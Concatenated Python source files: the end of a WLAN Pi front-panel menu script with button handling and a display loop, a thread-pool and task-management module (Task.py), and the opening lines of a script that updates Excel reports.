g_vars['sig_fired'] = True
menu_right()
g_vars['sig_fired'] = False
return
# Left/Back key
if gpio_pin == LEFT_KEY:
g_vars['sig_fired'] = True
menu_left()
g_vars['sig_fired'] = False
return
# Center key
if gpio_pin == CENTER_KEY:
g_vars['sig_fired'] = True
menu_center()
g_vars['sig_fired'] = False
return
###############################################################################
#
# ****** MAIN *******
#
###############################################################################
# First time around (power-up), draw logo on display
'''
rogues_gallery = [
IMAGE_DIR + '/wlanprologo',
IMAGE_DIR + '/wlanprologo.png',
IMAGE_DIR + '/joshschmelzle.png',
IMAGE_DIR + '/crv.png',
IMAGE_DIR + '/jolla.png',
IMAGE_DIR + '/wifinigel.png',
IMAGE_DIR + '/dansfini.png',
IMAGE_DIR + '/jiribrejcha.png'
]
random_image = random.choice(rogues_gallery)
image0 = Image.open(random_image).convert(DISPLAY_MODE)
oled.drawImage(image0)
time.sleep(2.0)
'''
###############################################################################
# Splash screen
###############################################################################
# First time around (power-up), animate logo on display
splash_screen_images = [
IMAGE_DIR + '/wlanpi0.png',
IMAGE_DIR + '/wlanpi1.png',
IMAGE_DIR + '/wlanpi2.png',
IMAGE_DIR + '/wlanpi3.png',
IMAGE_DIR + '/wlanpi4.png'
]
for image in splash_screen_images:
img = Image.open(image).convert(DISPLAY_MODE)
oled.drawImage(img)
time.sleep(0.100)
# Leave logo on screen some more time
time.sleep(2)
###############################################################################
# Buttons setup
###############################################################################
if emulate:
Device.pin_factory = MockFactory()
# Set signal handlers for button presses - these fire every time a button
# is pressed
def down_key():
button_press(BUTTONS_PINS['down'], g_vars)
def up_key():
button_press(BUTTONS_PINS['up'], g_vars)
def left_key():
button_press(BUTTONS_PINS['left'], g_vars)
def right_key():
button_press(BUTTONS_PINS['right'], g_vars)
def center_key():
button_press(BUTTONS_PINS['center'], g_vars)
button_down = GPIO_Button(BUTTONS_PINS['down'])
button_up = GPIO_Button(BUTTONS_PINS['up'])
button_left = GPIO_Button(BUTTONS_PINS['left'])
button_right = GPIO_Button(BUTTONS_PINS['right'])
button_center = GPIO_Button(BUTTONS_PINS['center'])
button_down.when_pressed = down_key
button_up.when_pressed = up_key
button_left.when_pressed = left_key
button_right.when_pressed = right_key
button_center.when_pressed = center_key
running = True
##############################################################################
# Emulate button presses using a keyboard
##############################################################################
def getch():
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def emulate_buttons():
global running
while True:
char = getch()
if (char == "k" or char == "K"):
running = False
break
if (char == "8" or char == "w"):
button_up.pin.drive_low()
button_up.pin.drive_high()
if (char == "2" or char == "x"):
button_down.pin.drive_low()
button_down.pin.drive_high()
if (char == "4" or char == "a"):
button_left.pin.drive_low()
button_left.pin.drive_high()
if (char == "6" or char == "d"):
button_right.pin.drive_low()
button_right.pin.drive_high()
if (char == "5" or char == "s"):
button_center.pin.drive_low()
button_center.pin.drive_high()
if emulate:
print("UP = 'w', DOWN = 'x', LEFT = 'a', RIGHT = 'd', CENTER = 's'")
print("Press 'k' to terminate.")
e = threading.Thread(name="button-emulator", target=emulate_buttons)
e.start()
##############################################################################
# Helper functions
##############################################################################
def check_eth():
'''
Detects a change in the status of the Ethernet port and wakes up
the screen if necessary
'''
try:
cmd = "cat /sys/class/net/eth0/carrier"
carrier = int(subprocess.check_output(cmd, shell=True).decode().strip())
if g_vars['eth_carrier_status'] != carrier:
g_vars['screen_cleared'] = False
g_vars['pageSleepCountdown'] = PAGE_SLEEP
g_vars['eth_carrier_status'] = carrier
except subprocess.CalledProcessError as exc:
pass
##############################################################################
# Constant 'while' loop to paint images on display or execute actions in
# response to selections made with buttons. When any of the 3 WLANPi buttons
# are pressed, I believe the signal handler takes over the Python interpreter
# and executes the code associated with the button. The original flow continues
# once the button press action has been completed.
#
# The current sleep period of the while loop is ignored when a button is
# pressed.
#
# All global variables defined outside of the while loop are preserved and may
# read/set as required. The same variables are available for read/write even
# when a button is pressed and an interrupt occurs: no additional thread or
# interpreter with its own set of vars appears to be launched. For this reason,
# vars may be used to signal between the main while loop and any button press
# activity to indicate that processes such as screen paints are in progress.
#
# Despite the sample code suggesting threading is used I do not believe this
# is the case, based on testing with variable scopes and checking for process
# IDs when different parts of the script are executing.
##############################################################################
while running:
try:
# check if eth0 link status has changed so we exit from screen save if needed
check_eth()
if g_vars['shutdown_in_progress'] or g_vars['screen_cleared'] or g_vars['drawing_in_progress'] or g_vars['sig_fired']:
                # we don't really want to do anything at the moment, let's
# nap and loop around
time.sleep(1)
continue
# Draw a menu or execute current action (dispatcher)
if g_vars['display_state'] != 'menu':
# no menu shown, so must be executing action.
# if we've just booted up, show home page
if g_vars['start_up'] == True:
g_vars['option_selected'] = home_page
# Re-run current action to refresh screen
#
# Handle when g_vars['option_selected'] does not return
# a func but returns a list instead and fpms freezes.
#
# investigate by uncommenting these print statements
# and `tail -f /tmp/nanoled-python.log`:
# print(g_vars['option_selected'])
# print(type(g_vars['option_selected']))
if isinstance(g_vars['option_selected'], list):
continue
else:
g_vars['option_selected']()
else:
                # let's try drawing our page (or refresh if already painted)
# No point in repainting screen if we are on a
# menu page and no buttons pressed since last loop cycle
# In reality, this condition will rarely (if ever) be true
# as the page painting is driven from the key press which
# interrupts this flow anyhow. Left in as a safeguard
if g_vars['button_press_count'] > g_vars['last_button_press_count']:
page_obj = Page(g_vars)
page_obj.draw_page(g_vars, menu)
# if screen timeout is zero, clear it if not already done (blank the
# display to reduce screenburn)
if g_vars['pageSleepCountdown'] == 0 and g_vars['screen_cleared'] == False:
oled.clearDisplay()
g_vars['screen_cleared'] = True
g_vars['pageSleepCountdown'] = g_vars['pageSleepCountdown'] - 1
# have a nap before we start our next loop
time.sleep(1)
except KeyboardInterrupt:
break
except IOError as ex:
print("Error " + str(ex))
g_vars['last_button_press_count'] = g_vars['button_press_count']
'''
Discounted ideas
1. Vary sleep timer for main while loop (e.g. longer for less frequently
    updating data) - doesn't work, as the main while loop may be in the middle of a
    long sleep when the button action is taken, making the screen refresh very slow.
'''
|
Task.py
|
#
# Task.py -- Basic command pattern and thread pool implementation.
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from __future__ import absolute_import, print_function
from . import six
from .six.moves import map, zip
import sys
import time
import os
if six.PY2:
import thread
import Queue
else:
import _thread as thread
import queue as Queue
# NOTE: See http://bugs.python.org/issue7946
# we cannot effectively use threading for loading files/network/etc.
# without setting the switchinterval down on python 3 due to the new
# GIL implementation
_swival = 0.000001
sys.setswitchinterval(_swival)
import threading
import traceback
class TaskError(Exception):
"""Exception generated for task errors"""
pass
class TaskTimeout(TaskError):
"""Exception generated when timing out waiting on a task"""
pass
class UserTaskException(Exception):
pass
# ------------ BASIC TASKS ------------
class Task(object):
"""This class implements a basic Task (command) abstraction. The
methods define the interface for starting, cancelling, waiting on a
task, etc.
"""
def __init__(self):
"""
The constructor sets bare essentials for a Task object. See the
initialize() and start() methods.
"""
self.ev_done = threading.Event()
self.callbacks = Queue.Queue()
self.tag = None
self.logger = None
self.threadPool = None
# Lock for task state critical sections
self.tlock = threading.RLock()
# Parent task can set this (or add to it) explicitly to determine
# which values will be copied when it calls initialize() on a child
# task.
self.shares = ['logger', 'threadPool', 'shares']
super(Task, self).__init__()
def initialize(self, taskParent, override=None):
"""This method initializes a task for (re)use. taskParent is the
object instance of the parent task, or a 'task environment' (something
that runs tasks).
If subclass overrides this method, it should call the superclass
method at some point.
- Copy shared data from taskParent, overriding items from _override_
if they are present there ('contagion' of task values).
- Generate a unique tag, to be used with the Gen2 Monitor.
- Clear done event, initialize times and result.
"""
# For now, punt if we have no apparent parent
if taskParent and hasattr(taskParent, 'shares'):
# Copy some variables from our parent task, unless they are being
# overridden explicitly. Using this general "contagion" mechanism,
            # a task can cause its children to have values available to them
# without passing them explicitly.
for var in taskParent.shares:
if override and var in override:
self.__dict__[var] = override[var]
else:
#print "COPYING VAR FROM PARENT: %s(%s)" % (var, str(taskParent.__dict__[var]))
self.__dict__[var] = taskParent.__dict__[var]
else:
#raise TaskError("Cannot initialize task without a taskParent!")
pass
# Generate our own unique tag. 'tagger' should have been transmitted
# from the parent task
if not self.tag:
try:
self.tag = str(taskParent) + '.' + self.tagger.get_tag(self)
except Exception:
# Failed--fall back to internal tagger
self.tag = get_tag(taskParent)
# Some per-task specific initialization
self.ev_done.clear()
self.starttime = time.time()
self.endtime = 0
self.totaltime = 0
self.result = None
return self.tag
def start(self):
"""This method starts a task executing and returns immediately.
Subclass should override this method, if it has an asynchronous
way to start the task and return immediately.
"""
if self.threadPool:
self.threadPool.addTask(self)
# Lets other threads have a chance to run
time.sleep(0)
else:
raise TaskError("start(): nothing to start for task %s" % self)
def init_and_start(self, taskParent, override={}):
"""Convenience method to initialize and start a task.
"""
tag = self.initialize(taskParent, override=override)
self.start()
return tag
def check_state(self):
"""Abstract method that should check for pause, cancellation, or
any other sort of preemption event.
"""
pass
def extend_shares(self, varlist):
shares = set(self.shares)
for var in varlist:
if hasattr(self, var):
shares.add(var)
self.shares = shares
def stop(self):
"""This method cancels an executing task (if possible).
Subclass should override this method.
Return True if task could be cancelled, False if not?
"""
raise TaskError("Task %s: subclass should override stop() method!" % (
self))
def pause(self):
"""This method pauses an executing task (if possible).
Subclass should override this method.
Return True if task could be paused, False if not?
"""
raise TaskError("Task %s: subclass should override pause() method!" % (
self))
def resume(self):
"""This method resumes an executing task (if possible).
Subclass should override this method, should not call super.resume().
Return True if task could be resumed, False if not?
"""
raise TaskError("Task %s: subclass should override resume() method!" % (
self))
def wait(self, timeout=None):
"""This method waits for an executing task to finish.
Subclass can override this method if necessary.
"""
self.ev_done.wait(timeout=timeout)
if not self.ev_done.is_set():
raise TaskTimeout("Task %s timed out." % self)
# --> self.result is set
# If it is an exception, then raise it in this waiter
if isinstance(self.result, Exception):
raise self.result
# Release waiters and perform callbacks
# done() has already been called, because of self.ev_done check
# "asynchronous" tasks should could call done() here
#self.done(self.result)
return self.result
def step(self):
"""If a task has a way of stepping through an operation. It can
implement this method. Subclass should not call super.step().
"""
raise TaskError("Task %s: subclass should override step() method!" %
self)
def execute(self):
"""This method does the work of a task (if executed by the
thread pool) and returns when it is finished. *** Subclass should
override this method! *** It should take no arguments, and can
return anything.
"""
raise TaskError("Task %s: subclass should override execute() method!" %
self)
def done(self, result, noraise=False):
"""This method is called when a task has finished executing.
Subclass can override this method if desired, but should call
superclass method at the end.
"""
# [??] Should this be in a critical section?
# Has done() already been called on this task?
if self.ev_done.is_set():
# ??
if isinstance(self.result, Exception) and (not noraise):
raise self.result
return self.result
# calculate running time and other finalization
self.endtime = time.time()
try:
self.totaltime = self.endtime - self.starttime
except AttributeError:
# task was not initialized properly
self.totaltime = 0.0
self.result = result
# Release thread waiters
self.ev_done.set()
# Perform callbacks for event-style waiters
self.do_callbacks()
# If the result is an exception, then our final act is to raise
        # it in the caller, unless the caller explicitly suppressed that
if isinstance(result, Exception) and (not noraise):
raise result
return result
def register_callback(self, fn, args=None):
"""This method is called to register a callback function to be
called when a task terminates.
Subclass should probably not override this method.
"""
if args is None:
args = []
if callable(fn):
self.callbacks.put((fn, args))
else:
raise TaskError("Function argument is not a callable: %s" % \
str(fn))
def do_callbacks(self):
"""Makes callbacks on all registered functions waiting on this task.
"""
while not self.callbacks.empty():
(fn, rest) = self.callbacks.get()
args = [self.result]
args.extend(rest)
fn(*args)
def get_tag(self):
"""This is only valid AFTER initialize() has been called on the task.
"""
return self.tag
def __str__(self):
"""Returns a string representation of a task (e.g. for debugging).
Subclass can override this method if desired.
"""
return str(self.tag)
def __lt__(self, other):
return False
def getExecutionTime(self):
return self.totaltime
def runTask(self, task, timeout=None):
"""Run a child task to completion. Returns the result of
the child task.
"""
# Initialize the task.
task.initialize(self)
# Start the task.
task.start()
# Lets other threads run
time.sleep(0)
# Wait for it to finish.
res = task.wait(timeout=timeout)
# Now we're done
return res
def run(self, task, timeout=None):
"""Run a child task to completion. Returns the result of
the child task. Simply calls runTask().
"""
return self.runTask(task, timeout=timeout)
# For testing...
class printTask(Task):
"""Simple task that prints msg."""
def __init__(self, msg):
self.msg = msg
super(printTask, self).__init__()
def execute(self):
print(self.msg)
class sleepTask(Task):
"""Simple task that sleeps for delay seconds."""
def __init__(self, delay):
self.delay = delay
super(sleepTask, self).__init__()
def execute(self):
self.ev_done.wait(timeout=self.delay)
class FuncTask(Task):
"""Simple task that calls func and returns func's return value."""
def __init__(self, func, args, kwdargs, logger=None):
self.func = func
self.args = args
self.kwdargs = kwdargs
self.logger = logger
super(FuncTask, self).__init__()
def execute(self):
if self.logger:
# Cap logging size around 500 characters
s_args = str(self.args)
if len(s_args) > 500:
s_args = s_args[:500]
s_kwdargs = str(self.kwdargs)
if len(s_kwdargs) > 500:
s_kwdargs = s_kwdargs[:500]
self.logger.debug("Running %s(%s, %s)" % (
self.func.__name__, s_args, s_kwdargs))
s_args = None
s_kwdargs = None
try:
res = self.func(*self.args, **self.kwdargs)
self.done(res)
if self.logger:
self.logger.debug("Function returned %s" % (
str(res)))
except Exception as e:
if self.logger:
self.logger.error("Task '%s' terminated with exception: %s" %
(str(self), str(e)))
try:
(type, value, tb) = sys.exc_info()
self.logger.error("Traceback:\n%s" %
"".join(traceback.format_tb(tb)))
tb = None
except Exception:
self.logger.error("Traceback information unavailable.")
self.done(e)
class FuncTask2(FuncTask):
"""Simple task that calls func and returns func's return value.
This version lets you specify the positional and keyword arguments
more naturally 'in place' in the constructor.
"""
def __init__(self, func, *args, **kwdargs):
super(FuncTask2, self).__init__(func, args, kwdargs)
def set_logger(self, logger):
self.logger = logger
def make_tasker(func):
"""make_tasker takes a callable (function, method, etc.) and returns
a new factory function for generating tasks. Each factory function is
designed to consume its arguments and return a task that, when executed,
will call the function upon the arguments.
TODO: deprecate this and just use FuncTask, which is easier to
understand--must change a number of programs first.
"""
def anonFunc(*args, **kwdargs):
class anonTask(Task):
def execute(self):
self.logger.debug("Executing fn %s" % func)
try:
val = func(*args, **kwdargs)
self.logger.debug("Done executing fn %s" % func)
return val
except Exception as e:
# Log error message and re-raise exception.
self.logger.error("fn %s raised exception: %s" % (
func, str(e)))
raise e
return anonTask()
return anonFunc
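# Illustrative usage sketch. A FuncTask2 can be exercised synchronously by
# calling execute() directly; in normal use a task is instead given a thread
# pool (see Task.start()) and submitted with init_and_start(). The pool
# implementation is not shown in this excerpt.
#
#   def add(a, b):
#       return a + b
#
#   t = FuncTask2(add, 2, 3)
#   t.execute()               # runs add(2, 3) and records the result via done()
#   print(t.wait(timeout=1))  # -> 5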
# ------------ COMPOUND TASKS ------------
class SequentialTaskset(Task):
"""Compound task that runs a series of tasks sequentially.
"""
def __init__(self, taskseq):
super(SequentialTaskset, self).__init__()
self.tasklist = list(taskseq)
def initialize(self, taskParent, **kwdargs):
self.index = 0
super(SequentialTaskset, self).initialize(taskParent, **kwdargs)
def step(self):
"""Run the next child task and wait for completion (no timeout)."""
if self.index >= len(self.tasklist):
raise TaskError("step(): sequential compound task %s finished" % self)
self.check_state()
# Select next task from the set and advance the index
self.task = self.tasklist[self.index]
self.index += 1
return self.runTask(self.task)
def execute(self):
"""Run all child tasks, in order, waiting for completion of each.
Return the result of the final child task's execution.
"""
while self.index < len(self.tasklist):
res = self.step()
self.logger.debug('SeqSet task %i has completed with result %s' %
(self.index, res))
# Returns result of last task to quit
return res
def stop(self):
"""Interrupt/cancel execution, but will allow current child task
to complete."""
#self.ev_intr.set()
try:
self.task.stop()
except TaskError as e:
self.logger.error("Error cancelling child task: %s" % (str(e)))
def addTask(self, task):
"""Append a task to the task sequence. If the SequentialTaskset has
already completed execution, this will do nothing unless it is
restarted (initialize(), start()).
"""
self.tasklist.append(task)
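# Illustrative sketch (heavily simplified). A compound task copies 'logger'
# and 'threadPool' to its children through the 'shares' mechanism, so it only
# needs a parent-like object carrying those attributes plus a pool that runs
# submitted tasks. InlinePool below is a hypothetical stand-in for the real
# thread pool and runs each task synchronously, so this demonstrates the
# wiring only, not real concurrency.
#
#   import logging
#
#   class InlinePool(object):
#       def addTask(self, task):
#           try:
#               res = task.execute()
#           except Exception as e:
#               res = e
#           task.done(res, noraise=True)
#
#   class Env(object):
#       def __init__(self):
#           self.logger = logging.getLogger('tasks')
#           self.threadPool = InlinePool()
#           self.shares = ['logger', 'threadPool', 'shares']
#
#   ts = SequentialTaskset([printTask('one'), printTask('two')])
#   ts.initialize(Env())
#   ts.execute()  # runs the children in order, printing 'one' then 'two'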
class ConcurrentAndTaskset(Task):
"""Compound task that runs a set of tasks concurrently, and does not
return until they all terminate.
"""
def __init__(self, taskseq):
super(ConcurrentAndTaskset, self).__init__()
self.taskseq = taskseq
# tuning value for polling inefficiency
self.idletime = 0.001
# internal mutex
self._lock_c = threading.RLock()
def execute(self):
"""Run all child tasks concurrently in separate threads.
Return last result after all child tasks have completed execution.
"""
with self._lock_c:
self.count = 0
self.numtasks = 0
self.taskset = []
self.results = {}
self.totaltime = time.time()
# Start all tasks
for task in self.taskseq:
self.taskset.append(task)
self.numtasks += 1
task.init_and_start(self)
num_tasks = self.getNumTasks()
# Wait on each task to clean up results
while num_tasks > 0:
self.check_state()
for i in range(num_tasks):
try:
try:
task = self.getTask(i)
except IndexError:
# A task got deleted from the set. Jump back out
# to outer loop and repoll the number of tasks
break
#self.logger.debug("waiting on %s" % task)
res = task.wait(timeout=self.idletime)
#self.logger.debug("finished: %s" % task)
self.child_done(res, task)
except TaskTimeout:
continue
except Exception as e:
#self.logger.warning("Subtask propagated exception: %s" % str(e))
self.child_done(e, task)
continue
# wait a bit and try again
#self.ev_quit.wait(self.idletime)
# re-get number of tasks, in case some were added or deleted
num_tasks = self.getNumTasks()
# Scan results for errors (exceptions) and raise the first one we find
for key in self.results.keys():
value = self.results[key]
if isinstance(value, Exception):
(count, task) = key
self.logger.error("Child task %s terminated with exception: %s" % (
task.tag, str(value)))
raise value
# Return value of last child to complete
return value
def child_done(self, result, task):
with self._lock_c:
self.count += 1
self.logger.debug('Concurrent task %d/%d has completed' % (
self.count, self.numtasks))
self.taskset.remove(task)
self.totaltime += task.getExecutionTime()
self.results[(self.count, task)] = result
def stop(self):
"""Call stop() on all child tasks, and ignore TaskError exceptions.
Behavior depends on what the child tasks' stop() method does."""
with self._lock_c:
for task in self.taskset:
try:
task.stop()
except TaskError as e:
# Task does not have a way to stop it.
# TODO: notify who?
pass
# stop ourself
#self.ev_intr.set()
def addTask(self, task):
"""Add a task to the task set.
"""
# Try to start task first. If it fails then we don't need to
# undo adding it to taskset
task.initialize(self)
task.start()
with self._lock_c:
self.numtasks += 1
self.taskset.append(task)
def getTask(self, i):
with self._lock_c:
return self.taskset[i]
def getNumTasks(self):
"""Get the set of active tasks.
"""
with self._lock_c:
return len(self.taskset)
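def _compound_tasks_example(task_parent, first_batch, second_batch):
    """Illustrative usage sketch (not part of the original module) for the
    compound tasks above.  It assumes `task_parent` is a fully initialized
    parent Task and that each batch is a fresh iterable of Task objects
    (reusing already-executed tasks is not assumed to be safe).
    """
    # Run one batch of tasks strictly one after another.
    seq = SequentialTaskset(first_batch)
    seq.init_and_start(task_parent)
    seq.wait()
    # Run another batch concurrently and wait for all of them to finish.
    conc = ConcurrentAndTaskset(second_batch)
    conc.init_and_start(task_parent)
    return conc.wait()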
class QueueTaskset(Task):
"""Compound task that runs a set of tasks that it reads from a queue
concurrently. If _waitflag_ is True, then it will run each task to
completion before starting the next task.
"""
def __init__(self, queue, waitflag=True, timeout=0.1, ev_quit=None):
super(QueueTaskset, self).__init__()
self.queue = queue
self.waitflag = waitflag
self.lock = threading.RLock()
self.timeout = timeout
self.task = None
self.ev_cancel = threading.Event()
self.ev_pause = threading.Event()
if ev_quit is None:
ev_quit = threading.Event()
self.ev_quit = ev_quit
def flush(self):
# Flush queue of pending tasks
self.logger.debug("Flushing queue.")
while True:
try:
self.queue.get(block=False)
except Queue.Empty:
break
def stop(self):
self.flush()
#self.ev_intr.set()
try:
if self.task:
self.task.stop()
except TaskError as e:
#self.logger.error("Error cancelling child task: %s" % (str(e)))
pass
# put termination sentinel
self.queue.put(None)
def stop_child(self):
self.flush()
try:
if self.task:
self.task.stop()
except TaskError as e:
#self.logger.error("Error cancelling child task: %s" % (str(e)))
pass
def execute(self):
self.count = 0
self.totaltime = 0
self.logger.debug("Queue Taskset starting")
while not self.ev_quit.is_set():
try:
self.check_state()
task = self.queue.get(block=True, timeout=self.timeout)
if task is None:
# termination sentinel
break
self.task = task
task.register_callback(self.child_done, args=[task])
with self.lock:
self.count += 1
self.ev_cancel.clear()
try:
task.initialize(self)
self.logger.debug("Starting task '%s'" % str(task))
task.start()
if self.waitflag:
res = task.wait()
self.logger.debug("Task %s terminated with result %s" % (
(str(task), str(res))))
except Exception as e:
self.logger.error("Task '%s' terminated with exception: %s" %
(str(task), str(e)))
try:
(type, value, tb) = sys.exc_info()
self.logger.debug("Traceback:\n%s" %
"".join(traceback.format_tb(tb)))
# NOTE: to avoid creating a cycle that might cause
# problems for GC--see Python library doc for sys
# module
tb = None
except Exception as e:
self.logger.debug("Traceback information unavailable.")
# If task raised exception then it didn't call done,
task.done(e, noraise=True)
except Queue.Empty:
# No task available. Continue trying to get one.
continue
# TODO: should we wait for self.count > 0?
self.logger.debug("Queue Taskset terminating")
return self.result
def child_done(self, result, task):
with self.lock:
self.count -= 1
self.totaltime += task.getExecutionTime()
self.result = result
def cancel(self):
self.flush()
super(QueueTaskset, self).cancel()
def addTask(self, task):
self.queue.put(task)
# ------------ PRIORITY QUEUES ------------
class PriorityQueue(Queue.PriorityQueue):
pass
# ------------ WORKER THREADS ------------
class _WorkerReset(Exception):
"""Local exception used to reset a worker thread."""
pass
class WorkerThread(object):
"""Container for a thread in which to call the execute() method of a task.
A WorkerThread object waits on the task queue, executes a task when it
appears, and repeats. A call to start() is necessary to start servicing
the queue, and a call to stop() will terminate the service.
"""
def __init__(self, queue, logger=None, ev_quit=None,
timeout=0.2, tpool=None):
self.queue = queue
self.logger = logger
self.timeout = timeout
if ev_quit:
self.ev_quit = ev_quit
else:
self.ev_quit = threading.Event()
self.tpool = tpool
self.lock = threading.RLock()
self.status = 'stopped'
self.time_start = 0.0
def setstatus(self, status):
"""Sets our status field so that others can inquire what we are doing.
Set of status:
starting, idle
"""
with self.lock:
self.status = status
def getstatus(self):
"""Returns our status--a string describing what we are doing.
"""
with self.lock:
return (self.status, self.time_start)
def execute(self, task):
"""Execute a task.
"""
taskid = str(task)
res = None
try:
# Try to run the task. If we catch an exception, then
# it becomes the result.
self.time_start = time.time()
self.setstatus('executing %s' % taskid)
self.logger.debug("now executing task '%s'" % taskid)
try:
res = task.execute()
except UserTaskException as e:
res = e
except Exception as e:
self.logger.error("Task '%s' raised exception: %s" %
(str(task), str(e)))
res = e
try:
(type, value, tb) = sys.exc_info()
self.logger.debug("Traceback:\n%s" %
"".join(traceback.format_tb(tb)))
# NOTE: to avoid creating a cycle that might cause
# problems for GC--see Python library doc for sys
# module
tb = None
except Exception as e:
self.logger.debug("Traceback information unavailable.")
finally:
self.logger.debug("done executing task '%s'" % str(task))
self.setstatus('cleaning %s' % taskid)
# Wake up waiters on other threads
task.done(res, noraise=True)
self.time_start = 0.0
self.setstatus('idle')
# Basic task execution loop. Dequeue a task and run it, then look
# for another one
def taskloop(self):
self.setstatus('starting')
self.logger.debug('Starting worker thread loop.')
# If we were handed a thread pool upon startup, then register
# ourselves with it.
if self.tpool:
self.tpool.register_up()
try:
self.setstatus('idle')
while not self.ev_quit.is_set():
try:
# Wait on our queue for a task; will timeout in
# self.timeout secs
(priority, task) = self.queue.get(block=True,
timeout=self.timeout)
if task is None:
# termination sentinel
self.queue.put((priority, task))
break
self.execute(task)
except _WorkerReset:
self.logger.info("Worker reset!")
except Queue.Empty as e:
# Reach here when we time out waiting for a task
pass
finally:
self.logger.debug('Stopping worker thread loop.')
if self.tpool:
self.tpool.register_dn()
self.setstatus('stopped')
def start(self):
self.thread = threading.Thread(target=self.taskloop, args=[])
self.thread.start()
def stop(self):
        # Put termination sentinel on the queue
self.queue.put((0, None))
self.ev_quit.set()
# ------------ THREAD POOL ------------
class ThreadPool(object):
"""A simple thread pool for executing tasks asynchronously.
self.status states:
down no threads are ready for service
up all threads are ready for service
start threads are starting, but not all of them are up yet
stop threads are stopping, but not all of them are down yet
"""
def __init__(self, numthreads=1, logger=None, ev_quit=None,
workerClass=WorkerThread):
self.numthreads = numthreads
self.logger = logger
if ev_quit:
self.ev_quit = ev_quit
else:
self.ev_quit = threading.Event()
self.lock = threading.RLock()
self.workerClass = workerClass
self.queue = PriorityQueue()
self.workers = []
self.tids = []
# Used to synchronize thread pool startup (see register() method)
self.regcond = threading.Condition()
self.runningcount = 0
self.status = 'down'
def startall(self, wait=False, **kwdargs):
"""Start all of the threads in the thread pool. If _wait_ is True
then don't return until all threads are up and running. Any extra
keyword arguments are passed to the worker thread constructor.
"""
self.logger.debug("startall called")
with self.regcond:
while self.status != 'down':
if self.status in ('start', 'up') or self.ev_quit.is_set():
# For now, abandon additional request to start
self.logger.error("ignoring duplicate request to start thread pool")
return
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
#assert(self.status == 'down')
if self.ev_quit.is_set():
return
self.runningcount = 0
self.status = 'start'
self.workers = []
if wait:
tpool = self
else:
tpool = None
# Start all worker threads
self.logger.debug("starting threads in thread pool")
for i in range(self.numthreads):
t = self.workerClass(self.queue, logger=self.logger,
ev_quit=self.ev_quit, tpool=tpool,
**kwdargs)
self.workers.append(t)
t.start()
# if started with wait=True, then expect that threads will register
# themselves and last one up will set status to "up"
if wait:
# Threads are on the way up. Wait until last one starts.
while self.status != 'up' and not self.ev_quit.is_set():
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
else:
# otherwise, we just assume the pool is up
self.status = 'up'
self.logger.debug("startall done")
def addThreads(self, numthreads, **kwdargs):
with self.regcond:
# Start all worker threads
self.logger.debug("adding %d threads to thread pool" % (
numthreads))
for i in range(numthreads):
t = self.workerClass(self.queue, logger=self.logger,
                                     ev_quit=self.ev_quit, tpool=self,
**kwdargs)
self.workers.append(t)
t.start()
self.numthreads += numthreads
def stopall(self, wait=False):
"""Stop all threads in the worker pool. If _wait_ is True
then don't return until all threads are down.
"""
self.logger.debug("stopall called")
with self.regcond:
while self.status != 'up':
if self.status in ('stop', 'down') or self.ev_quit.is_set():
# For now, silently abandon additional request to stop
self.logger.warning("ignoring duplicate request to stop thread pool.")
return
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
#assert(self.status == 'up')
self.logger.debug("stopping threads in thread pool")
self.status = 'stop'
# Signal to all threads to terminate.
self.ev_quit.set()
if wait:
# Threads are on the way down. Wait until last one quits.
while self.status != 'down':
self.logger.debug("waiting for threads: count=%d" %
self.runningcount)
self.regcond.wait()
self.logger.debug("stopall done")
def workerStatus(self):
return list(map(lambda t: t.getstatus(), self.workers))
def addTask(self, task, priority=0):
"""Add a task to the queue of tasks.
The task will be executed in a worker thread as soon as one is available.
Tasks are executed in first-come-first-served order.
"""
self.queue.put((priority, task))
def delTask(self, taskid):
self.logger.error("delTask not yet implemented")
def purgeTasks(self):
self.logger.error("purgeTasks not yet implemented")
def register_up(self):
"""Called by WorkerThread objects to register themselves.
Acquire the condition variable for the WorkerThread objects.
Increment the running-thread count. If we are the last thread to
start, set status to 'up'. This allows startall() to complete
if it was called with wait=True.
"""
with self.regcond:
self.runningcount += 1
tid = thread.get_ident()
self.tids.append(tid)
self.logger.debug("register_up: (%d) count is %d" %
(tid, self.runningcount))
if self.runningcount == self.numthreads:
self.status = 'up'
self.regcond.notify()
def register_dn(self):
"""Called by WorkerThread objects to register themselves.
Acquire the condition variable for the WorkerThread objects.
Decrement the running-thread count. If we are the last thread to
start, release the ThreadPool thread, which is stuck in start()
"""
with self.regcond:
self.runningcount -= 1
tid = thread.get_ident()
self.tids.remove(tid)
self.logger.debug("register_dn: count_dn is %d" % self.runningcount)
self.logger.debug("register_dn: remaining: %s" % str(self.tids))
if self.runningcount == 0:
self.status = 'down'
self.regcond.notify()
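def _threadpool_example(logger, some_task):
    """Illustrative usage sketch (not part of the original module) for the
    ThreadPool lifecycle.  It assumes `some_task` is a Task that has already
    been initialized (so its execute()/done() methods can run inside a
    WorkerThread) and that `logger` is a standard logging.Logger.
    """
    pool = ThreadPool(numthreads=4, logger=logger)
    # Block until every worker has called register_up().
    pool.startall(wait=True)
    try:
        # Lower priority values are pulled from the queue first.
        pool.addTask(some_task, priority=0)
        return some_task.wait()
    finally:
        # Block until every worker has called register_dn().
        pool.stopall(wait=True)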
# ------------ SUPPORT FUNCTIONS ------------
_lock_seqnum = threading.Lock()
_count_seqnum = 0
def get_tag(taskParent):
global _count_seqnum
with _lock_seqnum:
generic_id = 'task%d' % (_count_seqnum)
_count_seqnum += 1
if taskParent:
tag = str(taskParent) + '.' + generic_id
else:
tag = generic_id
return tag
#END
|
Update_xl_thread.py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Jan 7 15:53:26 2018
@author: Vadim Shkaberda
"""
from db_connect_sql import DBConnect
from log_error import writelog
from os import path
from pyodbc import Error as SQLError
from send_mail import send_mail
from xl import copy_file, update_file
import sharepoint
import sys
import threading
import time
class Main(object):
def __init__(self, fileinfo):
# Info about last file
self.fileinfo = fileinfo
self.sleep_duration = 30 # if no files to update
self.errors = {} # error description
# keys for SQL parsing
self.parse_keys = ('fname', 'fpath', 'reportID', 'reportName', 'Notifications', 'Attachments',
'NotificationsWhom', 'NotificationsCopy', 'Notificationstext', 'SecondResourceLink',
'GroupName')
